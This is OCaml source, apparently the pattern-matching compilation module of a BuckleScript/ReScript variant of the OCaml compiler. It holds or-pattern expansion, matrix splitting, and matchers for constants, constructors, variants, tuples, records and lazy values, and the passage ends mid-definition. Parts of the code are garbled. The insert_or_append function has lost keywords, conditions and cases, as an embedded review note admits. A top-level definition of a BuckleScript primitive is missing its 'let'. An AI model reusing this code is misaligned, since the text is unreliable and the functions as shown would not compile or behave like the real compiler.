(* Accumulate into [r] the identifiers bound by pattern [p]; only the
   left branch of or-patterns is considered (both bind the same set). *)
let rec extract_vars r p = match p.pat_desc with
| Tpat_var (id, _) -> IdentSet.add id r
| Tpat_alias (p, id,_ ) ->
    extract_vars (IdentSet.add id r) p
| Tpat_tuple pats ->
    List.fold_left extract_vars r pats
| Tpat_record (lpats,_) ->
    List.fold_left
      (fun r (_, _, p) -> extract_vars r p)
      r lpats
| Tpat_construct (_, _, pats) ->
    List.fold_left extract_vars r pats
| Tpat_array pats ->
    List.fold_left extract_vars r pats
| Tpat_variant (_,Some p, _) -> extract_vars r p
| Tpat_lazy p -> extract_vars r p
| Tpat_or (p,_,_) -> extract_vars r p
| Tpat_constant _|Tpat_any|Tpat_variant (_,None,_) -> r
exception Cannot_flatten

(* Renaming environment for [ids]: identifiers listed in [aliases] map
   to the matched argument itself (which must be a variable, otherwise
   Cannot_flatten); all others get a fresh identifier. *)
let mk_alpha_env arg aliases ids =
  List.map
    (fun id -> id,
      if List.mem id aliases then
        match arg with
        | Some v -> v
        | _ -> raise Cannot_flatten
      else
        Ident.create (Ident.name id))
    ids
(* Expand an or-pattern into one clause per alternative; each clause
   receives alpha-renamed copies of [vars], and its action is built by
   [mk_action] from the renamed identifiers. *)
let rec explode_or_pat arg patl mk_action rem vars aliases = function
  | {pat_desc = Tpat_or (p1,p2,_)} ->
      explode_or_pat
        arg patl mk_action
        (explode_or_pat arg patl mk_action rem vars aliases p2)
        vars aliases p1
  | {pat_desc = Tpat_alias (p,id, _)} ->
      explode_or_pat arg patl mk_action rem vars (id::aliases) p
  | {pat_desc = Tpat_var (x, _)} ->
      let env = mk_alpha_env arg (x::aliases) vars in
      (omega::patl,mk_action (List.map snd env))::rem
  | p ->
      let env = mk_alpha_env arg aliases vars in
      (alpha_pat env p::patl,mk_action (List.map snd env))::rem

(* Free variables of all the actions of a matching. *)
let pm_free_variables {cases=cases} =
  List.fold_right
    (fun (_,act) r -> IdentSet.union (free_variables act) r)
    cases IdentSet.empty
(* Head constructor of a constructor pattern. *)
let pat_as_constr = function
  | {pat_desc=Tpat_construct (_, cstr,_)} -> cstr
  | _ -> fatal_error "Matching.pat_as_constr"

(* Grouping predicates: one per matching style, recognizing the head
   patterns that belong to the corresponding group. *)
let group_constant = function
  | {pat_desc= Tpat_constant _} -> true
  | _ -> false

and group_constructor = function
  | {pat_desc = Tpat_construct (_,_,_)} -> true
  | _ -> false

and group_variant = function
  | {pat_desc = Tpat_variant (_, _, _)} -> true
  | _ -> false

and group_var = function
  | {pat_desc=Tpat_any} -> true
  | _ -> false

and group_tuple = function
  | {pat_desc = (Tpat_tuple _|Tpat_any)} -> true
  | _ -> false

and group_record = function
  | {pat_desc = (Tpat_record _|Tpat_any)} -> true
  | _ -> false

and group_array = function
  | {pat_desc=Tpat_array _} -> true
  | _ -> false

and group_lazy = function
  | {pat_desc = Tpat_lazy _} -> true
  | _ -> false
(* Select the grouping predicate for the style of pattern [p]. *)
let get_group p = match p.pat_desc with
| Tpat_any -> group_var
| Tpat_constant _ -> group_constant
| Tpat_construct _ -> group_constructor
| Tpat_tuple _ -> group_tuple
| Tpat_record _ -> group_record
| Tpat_array _ -> group_array
| Tpat_variant (_,_,_) -> group_variant
| Tpat_lazy _ -> group_lazy
| _ -> fatal_error "Matching.get_group"

let is_or p = match p.pat_desc with
| Tpat_or _ -> true
| _ -> false

(* Conditions allowing a clause to move above another: incompatible
   heads (conda), or unguarded action with a less precise row (condb). *)
let conda p q = not (may_compat p q)
and condb act ps qs = not (is_guarded act) && Parmatch.le_pats qs ps
(* The or-pattern clause (p,ps) may be appended below the clauses [l]. *)
let or_ok p ps l =
  List.for_all
    (function
      | ({pat_desc=Tpat_or _} as q::qs,act) ->
          conda p q || condb act ps qs
      | _ -> true)
    l

(* Pattern equivalence: mutual instance. *)
let equiv_pat p q = le_pat p q && le_pat q p

(* Longest prefix of clauses whose head is equivalent to [p], paired
   with the remaining clauses. *)
let rec get_equiv p l = match l with
  | (q::_,_) as cl::rem ->
      if equiv_pat p q then
        let others,rem = get_equiv p rem in
        cl::others,rem
      else
        [],l
  | _ -> [],l
(* Insert an or-pattern clause into the collected or-clauses [ors], or
   append it, or reject it to the [no] group.
   NOTE(review): this block is syntactically incomplete. During comment
   stripping/extraction, every source line that carried an end-of-line
   comment was deleted, which here removed several `then`/`else`
   keywords, the `or_ok p ps not_e &&` / `List.for_all` insert/append
   conditions, the `end else ...` arms and the terminal `| [] ->` case
   of [attempt]. Restore this definition from the upstream compiler
   sources (bytecomp/matching.ml) before building — do not attempt to
   guess the missing branches. *)
let insert_or_append p ps act ors no =
  let rec attempt seen = function
    | (q::qs,act_q) as cl::rem ->
        if is_or q then begin
          if may_compat p q then
            if
              IdentSet.is_empty (extract_vars IdentSet.empty p) &&
              IdentSet.is_empty (extract_vars IdentSet.empty q) &&
              equiv_pat p q
              let _, not_e = get_equiv q rem in
              if
                (fun cl -> match cl with
                  | (q::_,_) -> not (may_compat p q)
                  | _ -> assert false)
                seen
              List.rev_append seen ((p::ps,act)::cl::rem), no
              ors,(p::ps,act)::no
              attempt (cl::seen) rem
            else
              ors,(p::ps,act)::no
            attempt (cl::seen) rem
          attempt (cl::seen) rem
  attempt [] ors
(* Reconstruct default information from half_compiled pm list *)
(* Pattern matrix of a half-compiled matching; one omega column is
   added for each PmVar crossed. *)
let rec rebuild_matrix pmh = match pmh with
  | Pm pm -> as_matrix pm.cases
  | PmOr {or_matrix=m} -> m
  | PmVar x -> add_omega_column (rebuild_matrix x.inside)

(* Prepend default entries for the split-off sub-matchings [nexts]. *)
let rec rebuild_default nexts def = match nexts with
  | [] -> def
  | (e, pmh)::rem ->
      (add_omega_column (rebuild_matrix pmh), e)::
      rebuild_default rem def

(* Re-wrap each split-off sub-matching in a PmVar for argument [arg]. *)
let rebuild_nexts arg nexts k =
  List.fold_right
    (fun (e, pm) k -> (e, PmVar {inside=pm ; var_arg=arg})::k)
    nexts k
(*
  Split a matching.
  Splitting is first directed by or-patterns, then by
  tests (e.g. constructors)/variable transitions.

  The approach is greedy, every split function attempts to
  raise rows as much as possible in the top matrix,
  then splitting applies again to the remaining rows.

  Some precompilation of or-patterns and
  variable pattern occurs. Mostly this means that bindings
  are performed now, being replaced by let-bindings
  in actions (cf. simplify_cases).
  Additionally, if the match argument is a variable, matchings whose
  first column is made of variables only are splitted further
  (cf. precompile_var).
*)
(* Main splitting entry: simplify the clauses, then partition them into
   a top group [before], collected or-pattern clauses [ors], and clauses
   that cannot be raised [no]; the latter become a new sub-matching
   reached through a fresh exit. *)
let rec split_or argo cls args def =
  let cls = simplify_cases args cls in
  let rec do_split before ors no = function
    | [] ->
        cons_next
          (List.rev before) (List.rev ors) (List.rev no)
    | ((p::ps,act) as cl)::rem ->
        if up_ok cl no then
          if is_or p then
            let ors, no = insert_or_append p ps act ors no in
            do_split before ors no rem
          else begin
            if up_ok cl ors then
              do_split (cl::before) ors no rem
            else if or_ok p ps ors then
              do_split before (cl::ors) no rem
            else
              do_split before ors (cl::no) rem
          end
        else
          do_split before ors (cl::no) rem
    | _ -> assert false

  (* Package a split: compile the rejected rows as a further matching
     behind a fresh exit, added to the defaults. *)
  and cons_next yes yesor = function
    | [] ->
        precompile_or argo yes yesor args def []
    | rem ->
        let {me=next ; matrix=matrix ; top_default=def},nexts =
          do_split [] [] [] rem in
        let idef = next_raise_count () in
        precompile_or
          argo yes yesor args
          (cons_default matrix idef def)
          ((idef,next)::nexts) in

  do_split [] [] [] cls
(* Ultra-naive splitting, close to semantics, used for extension,
   as potential rebind prevents any kind of optimisation *)
(* Naive splitting for extensible constructors: rows are grouped into
   maximal runs headed by the same constructor (split_exc) or by
   non-constructor patterns (split_noexc). *)
and split_naive cls args def k =
  let rec split_exc cstr0 yes = function
    | [] ->
        let yes = List.rev yes in
        { me = Pm {cases=yes; args=args; default=def;} ;
          matrix = as_matrix yes ;
          top_default=def},
        k
    | (p::_,_ as cl)::rem ->
        if group_constructor p then
          let cstr = pat_as_constr p in
          if cstr = cstr0 then split_exc cstr0 (cl::yes) rem
          else
            (* new constructor: close the current run behind an exit *)
            let yes = List.rev yes in
            let {me=next ; matrix=matrix ; top_default=def}, nexts =
              split_exc cstr [cl] rem in
            let idef = next_raise_count () in
            let def = cons_default matrix idef def in
            { me = Pm {cases=yes; args=args; default=def} ;
              matrix = as_matrix yes ;
              top_default = def; },
            (idef,next)::nexts
        else
          let yes = List.rev yes in
          let {me=next ; matrix=matrix ; top_default=def}, nexts =
            split_noexc [cl] rem in
          let idef = next_raise_count () in
          let def = cons_default matrix idef def in
          { me = Pm {cases=yes; args=args; default=def} ;
            matrix = as_matrix yes ;
            top_default = def; },
          (idef,next)::nexts
    | _ -> assert false

  and split_noexc yes = function
    | [] -> precompile_var args (List.rev yes) def k
    | (p::_,_ as cl)::rem ->
        if group_constructor p then
          let yes= List.rev yes in
          let {me=next; matrix=matrix; top_default=def;},nexts =
            split_exc (pat_as_constr p) [cl] rem in
          let idef = next_raise_count () in
          precompile_var
            args yes
            (cons_default matrix idef def)
            ((idef,next)::nexts)
        else split_noexc (cl::yes) rem
    | _ -> assert false in

  match cls with
  | [] -> assert false
  | (p::_,_ as cl)::rem ->
      if group_constructor p then
        split_exc (pat_as_constr p) [cl] rem
      else
        split_noexc [cl] rem
  | _ -> assert false
(* Split by test vs. variable transitions on the first column; rows in
   the same group as the discriminating pattern are raised when the
   swap conditions (up_ok) allow it. *)
and split_constr cls args def k =
  let ex_pat = what_is_cases cls in
  match ex_pat.pat_desc with
  | Tpat_any -> precompile_var args cls def k
  | Tpat_construct (_,{cstr_tag=Cstr_extension _},_) ->
      split_naive cls args def k
  | _ ->
      let group = get_group ex_pat in
      let rec split_ex yes no = function
        | [] ->
            let yes = List.rev yes and no = List.rev no in
            begin match no with
            | [] ->
                {me = Pm {cases=yes ; args=args ; default=def} ;
                 matrix = as_matrix yes ;
                 top_default = def},
                k
            | cl::rem ->
                begin match yes with
                | [] ->
                    (* nothing raised: start a variable group instead *)
                    split_noex [cl] [] rem
                | _ ->
                    let {me=next ; matrix=matrix ; top_default=def}, nexts =
                      split_noex [cl] [] rem in
                    let idef = next_raise_count () in
                    let def = cons_default matrix idef def in
                    {me = Pm {cases=yes ; args=args ; default=def} ;
                     matrix = as_matrix yes ;
                     top_default = def },
                    (idef, next)::nexts
                end
            end
        | (p::_,_) as cl::rem ->
            if group p && up_ok cl no then
              split_ex (cl::yes) no rem
            else
              split_ex yes (cl::no) rem
        | _ -> assert false

      and split_noex yes no = function
        | [] ->
            let yes = List.rev yes and no = List.rev no in
            begin match no with
            | [] -> precompile_var args yes def k
            | cl::rem ->
                let {me=next ; matrix=matrix ; top_default=def}, nexts =
                  split_ex [cl] [] rem in
                let idef = next_raise_count () in
                precompile_var
                  args yes
                  (cons_default matrix idef def)
                  ((idef,next)::nexts)
            end
        | [ps,_ as cl]
          when List.for_all group_var ps && yes <> [] ->
            (* final all-variable row is rejected to close the group *)
            split_noex yes (cl::no) []
        | (p::_,_) as cl::rem ->
            if not (group p) && up_ok cl no then
              split_noex (cl::yes) no rem
            else
              split_noex yes (cl::no) rem
        | _ -> assert false in

      match cls with
      | ((p::_,_) as cl)::rem ->
          if group p then split_ex [cl] [] rem
          else split_noex [cl] [] rem
      | _ -> assert false
(* Variable transition: when the next argument is itself a variable,
   skip the current (all-variable) column, precompile the rest, and
   re-wrap the result in PmVar.
   Fix: the `| [ps,_] ->` and `| [] ->` case headers had been stripped
   together with their end-of-line comments during extraction, leaving
   orphaned case bodies and a syntax error; they are restored here. *)
and precompile_var args cls def k = match args with
| [] -> assert false
| _::((Lvar v as av,_) as arg)::rargs ->
    begin match cls with
    | [ps,_] -> (* as split as it can be: nothing to gain *)
        dont_precompile_var args cls def k
    | _ ->
        (* drop the head column and precompile the remaining matching *)
        let var_cls =
          List.map
            (fun (ps,act) -> match ps with
              | _::ps -> ps,act | _ -> assert false)
            cls
        and var_def = make_default (fun _ rem -> rem) def in
        let {me=first ; matrix=matrix}, nexts =
          split_or (Some v) var_cls (arg::rargs) var_def in
        (* rebuild top-level information *)
        match nexts with
        | [] -> (* no sub-matching was split off: keep the plain form *)
            dont_precompile_var args cls def k
        | _ ->
            let rfirst =
              {me = PmVar {inside=first ; var_arg = av} ;
               matrix = add_omega_column matrix ;
               top_default = rebuild_default nexts def ; }
            and rnexts = rebuild_nexts av nexts k in
            rfirst, rnexts
    end
| _ ->
    dont_precompile_var args cls def k
(* Fallback: package the clauses as a plain Pm, without skipping. *)
and dont_precompile_var args cls def k =
  {me = Pm {cases = cls ; args = args ; default = def } ;
   matrix=as_matrix cls ;
   top_default=def},k
(* Compile the collected or-pattern clauses: each or-pattern becomes an
   exit to a handler matching its sub-matching; its alternatives are
   expanded in place by explode_or_pat. *)
and precompile_or argo cls ors args def k = match ors with
| [] -> split_constr cls args def k
| _ ->
    let rec do_cases = function
      | ({pat_desc=Tpat_or _} as orp::patl, action)::rem ->
          let others,rem = get_equiv orp rem in
          (* sub-matching for the rows equivalent to this or-pattern *)
          let orpm =
            {cases =
              (patl, action)::
              List.map
                (function
                  | (_::ps,action) -> ps,action
                  | _ -> assert false)
                others ;
             args = (match args with _::r -> r | _ -> assert false) ;
             default = default_compat orp def} in
          (* variables bound by the or-pattern and used by the actions
             become the arguments of the exit *)
          let vars =
            IdentSet.elements
              (IdentSet.inter
                 (extract_vars IdentSet.empty orp)
                 (pm_free_variables orpm)) in
          let or_num = next_raise_count () in
          let new_patl = Parmatch.omega_list patl in
          let mk_new_action vs =
            Lstaticraise
              (or_num, List.map (fun v -> Lvar v) vs) in
          let body,handlers = do_cases rem in
          explode_or_pat
            argo new_patl mk_new_action body vars [] orp,
          let mat = [[orp]] in
          ((mat, or_num, vars , orpm):: handlers)
      | cl::rem ->
          let new_ord,new_to_catch = do_cases rem in
          cl::new_ord,new_to_catch
      | [] -> [],[] in
    let end_body, handlers = do_cases ors in
    let matrix = as_matrix (cls@ors)
    and body = {cases=cls@end_body ; args=args ; default=def} in
    {me = PmOr {body=body ; handlers=handlers ; or_matrix=matrix} ;
     matrix=matrix ;
     top_default=def},
    k
(* Split [pm]; when the split is non-trivial and debugging is enabled,
   dump both the input and the result. *)
let split_precompile argo pm =
  let {me=next}, nexts = split_or argo pm.cases pm.args pm.default in
  if dbg && (nexts <> [] || (match next with PmOr _ -> true | _ -> false))
  then begin
    prerr_endline "** SPLIT **" ;
    pretty_pm pm ;
    pretty_precompiled_res next nexts
  end ;
  next, nexts
(* Prepend a clause to a matching, in place. *)
let add_line patl_action pm = pm.cases <- patl_action :: pm.cases; pm

(* A sub-matching under construction, with its context and the
   (normalized) pattern that selected it. *)
type cell =
  {pm : pattern_matching ;
   ctx : ctx list ;
   pat : pattern}

(* Add a clause to the division entry for [key], creating the entry
   with [make_matching_fun] when absent. *)
let add make_matching_fun division eq_key key patl_action args =
  try
    let (_,cell) = List.find (fun (k,_) -> eq_key key k) division in
    cell.pm.cases <- patl_action :: cell.pm.cases;
    division
  with Not_found ->
    let cell = make_matching_fun args in
    cell.pm.cases <- [patl_action] ;
    (key, cell) :: division
(* Divide the clauses of [pm] into sub-matchings keyed by [get_key]. *)
let divide make eq_key get_key get_args ctx pm =
  let rec divide_rec = function
    | (p::patl,action) :: rem ->
        let this_match = divide_rec rem in
        add
          (make p pm.default ctx)
          this_match eq_key (get_key p) (get_args p patl,action) pm.args
    | _ -> [] in
  divide_rec pm.cases

(* Degenerate division: all clauses fall into one single sub-matching. *)
let divide_line make_ctx make get_args pat ctx pm =
  let rec divide_rec = function
    | (p::patl,action) :: rem ->
        let this_match = divide_rec rem in
        add_line (get_args p patl, action) this_match
    | _ -> make pm.default pm.args in
  {pm = divide_rec pm.cases ;
   ctx=make_ctx ctx ;
   pat=pat}
(*
  Then come various functions.
  There is one set of functions per matching style
  (constants, constructors etc.)

  - matcher functions are arguments to make_default (for default handlers)
  They may raise NoMatch or OrPat and perform the full
  matching (selection + arguments).

  - get_args and get_key are for the compiled matrices, note that
  selection and getting arguments are separated.

  - make_*_matching combines the previous functions for producing
  new ``pattern_matching'' records.
*)
(* Default-matrix matcher for constant [cst]: keep rows whose head may
   match it, raise NoMatch otherwise; or-patterns try both sides. *)
let rec matcher_const cst p rem = match p.pat_desc with
| Tpat_or (p1,p2,_) ->
    begin try
      matcher_const cst p1 rem with
    | NoMatch -> matcher_const cst p2 rem
    end
| Tpat_constant c1 when const_compare c1 cst = 0 -> rem
| Tpat_any -> rem
| _ -> raise NoMatch
(* The constant of a constant pattern; [caller] identifies the call
   site in the diagnostic printed before the assertion failure. *)
let get_key_constant caller = function
  | {pat_desc= Tpat_constant cst} -> cst
  | p ->
      prerr_endline ("BAD: "^caller) ;
      pretty_pat p ;
      assert false

(* Constants carry no sub-patterns. *)
let get_args_constant _ rem = rem
(* Fresh sub-matching for the constant group of [p]. *)
let make_constant_matching p def ctx = function
    [] -> fatal_error "Matching.make_constant_matching"
  | (_ :: argl) ->
      let def =
        make_default
          (matcher_const (get_key_constant "make" p)) def
      and ctx =
        filter_ctx p ctx in
      {pm = {cases = []; args = argl ; default = def} ;
       ctx = ctx ;
       pat = normalize_pat p}

let divide_constant ctx m =
  divide
    make_constant_matching
    (fun c d -> const_compare c d = 0) (get_key_constant "divide")
    get_args_constant
    ctx m
(* Arguments for constructor sub-patterns: one Pfield access per
   position in [first_pos..last_pos], prepended to [argl]. *)
let make_field_args ~fld_info loc binding_kind arg first_pos last_pos argl =
  let rec make_args pos =
    if pos > last_pos
    then argl
    else (Lprim(Pfield (pos, fld_info), [arg], loc), binding_kind) :: make_args (pos + 1)
  in make_args first_pos
(* Constructor clauses are keyed by their runtime tag. *)
let get_key_constr = function
  | {pat_desc=Tpat_construct (_, cstr,_)} -> cstr.cstr_tag
  | _ -> assert false

let get_args_constr p rem = match p with
| {pat_desc=Tpat_construct (_, _, args)} -> args @ rem
| _ -> assert false
(*
  NB: matcher_constr applies to default matrices.

  In that context, matching by constructors of extensible
  types degrades to arity checking, due to potential rebinding.
  This comparison is performed by Types.may_equal_constr.
*)
(* Default-matrix matcher for constructor [cstr], specialized on
   arity: 0 and 1 handle or-patterns by trying both sides; higher
   arities delegate or-patterns to the generic OrPat machinery. *)
let matcher_constr cstr = match cstr.cstr_arity with
| 0 ->
    let rec matcher_rec q rem = match q.pat_desc with
      | Tpat_or (p1,p2,_) ->
          begin
            try matcher_rec p1 rem
            with NoMatch -> matcher_rec p2 rem
          end
      | Tpat_construct (_, cstr',[])
        when Types.may_equal_constr cstr cstr' -> rem
      | Tpat_any -> rem
      | _ -> raise NoMatch in
    matcher_rec
| 1 ->
    let rec matcher_rec q rem = match q.pat_desc with
      | Tpat_or (p1,p2,_) ->
          (* try both alternatives; when both succeed, merge the
             argument patterns into a fresh or-pattern *)
          let r1 = try Some (matcher_rec p1 rem) with NoMatch -> None
          and r2 = try Some (matcher_rec p2 rem) with NoMatch -> None in
          begin match r1,r2 with
          | None, None -> raise NoMatch
          | Some r1, None -> r1
          | None, Some r2 -> r2
          | Some (a1::_), Some (a2::_) ->
              {a1 with
               pat_loc = Location.none ;
               pat_desc = Tpat_or (a1, a2, None)}::
              rem
          | _, _ -> assert false
          end
      | Tpat_construct (_, cstr', [arg])
        when Types.may_equal_constr cstr cstr' -> arg::rem
      | Tpat_any -> omega::rem
      | _ -> raise NoMatch in
    matcher_rec
| _ ->
    fun q rem -> match q.pat_desc with
      | Tpat_or (_,_,_) -> raise OrPat
      | Tpat_construct (_,cstr',args)
        when Types.may_equal_constr cstr cstr' -> args @ rem
      | Tpat_any -> Parmatch.omegas cstr.cstr_arity @ rem
      | _ -> raise NoMatch
(* BuckleScript-specific primitives used when compiling constructors
   with an option-like ("optional") shape. *)
let is_not_none_bs_primitve : Lambda.primitive =
  Pccall
    (Primitive.simple ~name:"#is_not_none" ~arity:1 ~alloc:false)

let val_from_option_bs_primitive : Lambda.primitive =
  Pccall
    (Primitive.simple ~name:"#val_from_option" ~arity:1 ~alloc:true)

val_from_unnest_option_bs_primitive : Lambda.primitive =
  Pccall
    (Primitive.simple ~name:"#val_from_unnest_option" ~arity:1 ~alloc:true)
(* Fresh sub-matching for the constructor group of [p]; arguments are
   field accesses, except for inlined records, unboxed constructors
   and the BuckleScript option-like optimization. *)
let make_constr_matching p def ctx = function
    [] -> fatal_error "Matching.make_constr_matching"
  | ((arg, _mut) :: argl) ->
      let cstr = pat_as_constr p in
      let newargs =
        if cstr.cstr_inlined <> None then
          (arg, Alias) :: argl
        else match cstr.cstr_tag with
          | Cstr_block _ when
              !Config.bs_only &&
              Datarepr.constructor_has_optional_shape cstr
            ->
              begin
                let from_option =
                  match p.pat_desc with
                  | Tpat_construct(_, _,
                                   [ {
                                     pat_type ; pat_env
                                   } ])
                    when Typeopt.cannot_inhabit_none_like_value pat_type pat_env
                    -> val_from_unnest_option_bs_primitive
                  | _ -> val_from_option_bs_primitive in
                (Lprim (from_option, [arg], p.pat_loc), Alias) :: argl
              end
          | Cstr_constant _
          | Cstr_block _ ->
              make_field_args p.pat_loc Alias arg 0 (cstr.cstr_arity - 1) argl
                ~fld_info:(if cstr.cstr_name = "::" then Fld_cons else Fld_variant)
          | Cstr_unboxed -> (arg, Alias) :: argl
          | Cstr_extension _ ->
              (* field 0 holds the extension slot; args start at 1 *)
              make_field_args p.pat_loc Alias arg 1 cstr.cstr_arity argl
                ~fld_info:Fld_extension
      in
      {pm=
         {cases = []; args = newargs;
          default = make_default (matcher_constr cstr) def} ;
       ctx = filter_ctx p ctx ;
       pat=normalize_pat p}

let divide_constructor ctx pm =
  divide
    make_constr_matching
    Types.equal_tag get_key_constr get_args_constr
    ctx pm
(* Default-matrix matcher for the constant polymorphic variant [lab]. *)
let rec matcher_variant_const lab p rem = match p.pat_desc with
| Tpat_or (p1, p2, _) ->
    begin
      try
        matcher_variant_const lab p1 rem
      with
      | NoMatch -> matcher_variant_const lab p2 rem
    end
| Tpat_variant (lab1,_,_) when lab1=lab -> rem
| Tpat_any -> rem
| _ -> raise NoMatch

let make_variant_matching_constant p lab def ctx = function
    [] -> fatal_error "Matching.make_variant_matching_constant"
  | (_ :: argl) ->
      let def = make_default (matcher_variant_const lab) def
      and ctx = filter_ctx p ctx in
      {pm={ cases = []; args = argl ; default=def} ;
       ctx=ctx ;
       pat = normalize_pat p}
(* Default-matrix matcher for the non-constant variant [lab]. *)
let matcher_variant_nonconst lab p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_variant (lab1,Some arg,_) when lab1=lab -> arg::rem
| Tpat_any -> omega::rem
| _ -> raise NoMatch

(* The variant argument lives in field 1 (field 0 holds the hash). *)
let make_variant_matching_nonconst p lab def ctx = function
    [] -> fatal_error "Matching.make_variant_matching_nonconst"
  | ((arg, _mut) :: argl) ->
      let def = make_default (matcher_variant_nonconst lab) def
      and ctx = filter_ctx p ctx in
      {pm=
        {cases = []; args = (Lprim(Pfield (1, Fld_poly_var_content), [arg], p.pat_loc), Alias) :: argl;
         default=def} ;
       ctx=ctx ;
       pat = normalize_pat p}
(* Divide polymorphic-variant clauses by label, skipping labels absent
   from the row type; keys pair the label with its hashed tag. *)
let divide_variant row ctx {cases = cl; args = al; default=def} =
  let row = Btype.row_repr row in
  let rec divide = function
      ({pat_desc = Tpat_variant(lab, pato, _)} as p:: patl, action) :: rem ->
        let variants = divide rem in
        if try Btype.row_field_repr (List.assoc lab row.row_fields) = Rabsent
        with Not_found -> true
        then
          variants
        else begin
          let tag = Btype.hash_variant lab in
          (* local key equality: label and tag must both agree *)
          let (=) ((a:string),(b:Types.constructor_tag)) (c,d) =
            a = c && Types.equal_tag b d
          in
          match pato with
            None ->
              add (make_variant_matching_constant p lab def ctx) variants
                (=) (lab,Cstr_constant tag) (patl, action) al
          | Some pat ->
              add (make_variant_matching_nonconst p lab def ctx) variants
                (=) (lab,Cstr_block tag) (pat :: patl, action) al
        end
    | _ -> []
  in
  divide cl
(*
  Three ``no-test'' cases
*)
(* Variables carry no sub-patterns. *)
let get_args_var _ rem = rem

(* Variable transition: simply drop the first argument. *)
let make_var_matching def = function
  | [] -> fatal_error "Matching.make_var_matching"
  | _::argl ->
      {cases=[] ;
       args = argl ;
       default= make_default get_args_var def}

let divide_var ctx pm =
  divide_line ctx_lshift make_var_matching get_args_var omega ctx pm
(* Sub-pattern of a lazy pattern (omega for wildcards). *)
let get_arg_lazy p rem = match p with
| {pat_desc = Tpat_any} -> omega :: rem
| {pat_desc = Tpat_lazy arg} -> arg :: rem
| _ -> assert false

let matcher_lazy p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omega :: rem
| Tpat_lazy arg -> arg :: rem
| _ -> raise NoMatch
(* Lazily look up [field] in the persistent module [modname], building
   the lambda-code that accesses it at runtime. *)
let get_mod_field modname field =
  lazy (
    try
      let mod_ident = Ident.create_persistent modname in
      let env = Env.open_pers_signature modname Env.initial_safe_string in
      let p = try
        match Env.lookup_value (Longident.Lident field) env with
        | (Path.Pdot(_,_,i), _) -> i
        | _ -> fatal_error ("Primitive "^modname^"."^field^" not found.")
      with Not_found ->
        fatal_error ("Primitive "^modname^"."^field^" not found.")
      in
      Lprim(Pfield (p, Fld_module {name = field}),
            [Lprim(Pgetglobal mod_ident, [], Location.none)],
            Location.none)
    with Not_found -> fatal_error ("Module "^modname^" unavailable.")
  )

(* CamlinternalLazy.force, fetched on first use. *)
let code_force =
  get_mod_field "CamlinternalLazy" "force"
;;
(* inline_lazy_force inlines the beginning of the code of Lazy.force. When
   the value argument is tagged as:
   - forward, take field 0
   - lazy, call the primitive that forces (without testing again the tag)
   - anything else, return it

   Using Lswitch below relies on the fact that the GC does not shortcut
   Forward(val_out_of_heap).
*)
(* Force a lazy value by calling CamlinternalLazy.force directly. *)
let inline_lazy_force arg loc =
  Lapply { ap_func = Lazy.force code_force; ap_inlined = Default_inline; ap_args = [arg]; ap_loc = loc}
(* Sub-matching for lazy patterns: the argument is forced eagerly
   (Strict) and matching continues on the forced value. *)
let make_lazy_matching def = function
    [] -> fatal_error "Matching.make_lazy_matching"
  | (arg,_mut) :: argl ->
      { cases = [];
        args =
          (inline_lazy_force arg Location.none, Strict) :: argl;
        default = make_default matcher_lazy def }

let divide_lazy p ctx pm =
  divide_line
    (filter_ctx p)
    make_lazy_matching
    get_arg_lazy
    p ctx pm
(* Sub-patterns of a tuple pattern (omegas for wildcards). *)
let get_args_tuple arity p rem = match p with
| {pat_desc = Tpat_any} -> omegas arity @ rem
| {pat_desc = Tpat_tuple args} ->
    args @ rem
| _ -> assert false

let matcher_tuple arity p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ -> omegas arity @ rem
| Tpat_tuple args when List.length args = arity -> args @ rem
| _ -> raise NoMatch

(* Sub-matching for a tuple: one field access per component. *)
let make_tuple_matching loc arity def = function
    [] -> fatal_error "Matching.make_tuple_matching"
  | (arg, _mut) :: argl ->
      let rec make_args pos =
        if pos >= arity
        then argl
        else (Lprim(Pfield (pos, Fld_tuple), [arg], loc), Alias) :: make_args (pos + 1) in
      {cases = []; args = make_args 0 ;
       default=make_default (matcher_tuple arity) def}

let divide_tuple arity p ctx pm =
  divide_line
    (filter_ctx p)
    (make_tuple_matching p.pat_loc arity)
    (get_args_tuple arity) p ctx pm
(* A full row of sub-patterns for a record: omega everywhere except at
   the positions bound in [lbl_pat_list]. *)
let record_matching_line num_fields lbl_pat_list =
  let patv = Array.make num_fields omega in
  List.iter (fun (_, lbl, pat) -> patv.(lbl.lbl_pos) <- pat) lbl_pat_list;
  Array.to_list patv

let get_args_record num_fields p rem = match p with
| {pat_desc=Tpat_any} ->
    record_matching_line num_fields [] @ rem
| {pat_desc=Tpat_record (lbl_pat_list,_)} ->
    record_matching_line num_fields lbl_pat_list @ rem
| _ -> assert false

let matcher_record num_fields p rem = match p.pat_desc with
| Tpat_or (_,_,_) -> raise OrPat
| Tpat_any
| Tpat_var _ ->
    record_matching_line num_fields [] @ rem
| Tpat_record ([], _) when num_fields = 0 -> rem
| Tpat_record ((_, lbl, _) :: _ as lbl_pat_list, _)
  when Array.length lbl.lbl_all = num_fields ->
    record_matching_line num_fields lbl_pat_list @ rem
| _ -> raise NoMatch

(* Field access code depends on the record representation
   (regular, inlined, unboxed, extension). *)
let make_record_matching loc all_labels def = function
    [] -> fatal_error "Matching.make_record_matching"
  | ((arg, _mut) :: argl) ->
      let rec make_args pos =
        if pos >= Array.length all_labels then argl else begin
          let lbl = all_labels.(pos) in
          let access =
            match lbl.lbl_repres with
            | Record_float_unused -> assert false
            | Record_regular | Record_optional_labels _ ->
                Lprim (Pfield (lbl.lbl_pos, !Lambda.fld_record lbl), [arg], loc)
            | Record_inlined _ ->
                Lprim (Pfield (lbl.lbl_pos, Fld_record_inline {name = lbl.lbl_name}), [arg], loc)
            | Record_unboxed _ -> arg
            | Record_extension -> Lprim (Pfield (lbl.lbl_pos + 1, Fld_record_extension {name = lbl.lbl_name}), [arg], loc)
          in
          let str =
            match lbl.lbl_mut with
              Immutable -> Alias
            | Mutable -> StrictOpt in
          (access, str) :: make_args(pos + 1)
        end in
      let nfields = Array.length all_labels in
      let def= make_default (matcher_record nfields) def in
      {cases = []; args = make_args 0 ; default = def}

let divide_record all_labels p ctx pm =
  let get_args = get_args_record (Array.length all_labels) in
  divide_line
    (filter_ctx p)
    (make_record_matching p.pat_loc all_labels)
    get_args
    p ctx pm
(* Array patterns are keyed by their length. *)
let get_key_array = function
  | {pat_desc=Tpat_array patl} -> List.length patl
  | _ -> assert false

let get_args_array p rem = match p with
